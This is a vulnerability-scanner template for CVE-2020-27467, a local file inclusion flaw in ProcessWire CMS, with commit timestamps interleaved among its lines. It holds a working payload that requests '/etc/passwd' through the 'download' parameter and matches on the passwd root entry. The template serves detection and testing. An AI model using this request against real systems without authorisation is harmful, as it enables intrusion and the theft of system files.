2022-03-21 09:23:59 +00:00
id : CVE-2020-27467
2022-04-22 10:38:41 +00:00
2022-03-21 09:23:59 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Processwire CMS <2.7.1 - Local File Inclusion
2022-03-21 09:23:59 +00:00
author : 0x_Akoko
severity : high
2022-07-26 13:45:11 +00:00
description : Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php.
2022-03-21 09:23:59 +00:00
reference :
- https://github.com/Y1LD1R1M-1337/LFI-ProcessWire
2022-03-21 11:26:48 +00:00
- https://processwire.com/
2022-05-17 09:18:12 +00:00
- https://github.com/ceng-yildirim/LFI-processwire
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-27467
2022-03-21 09:23:59 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2020-27467
cwe-id : CWE-22
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:*
epss-score : 0.00324
2022-03-21 11:26:48 +00:00
tags : cve,cve2020,processwire,lfi,cms,oss
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-03-21 09:23:59 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-03-21 09:23:59 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php?download=/etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200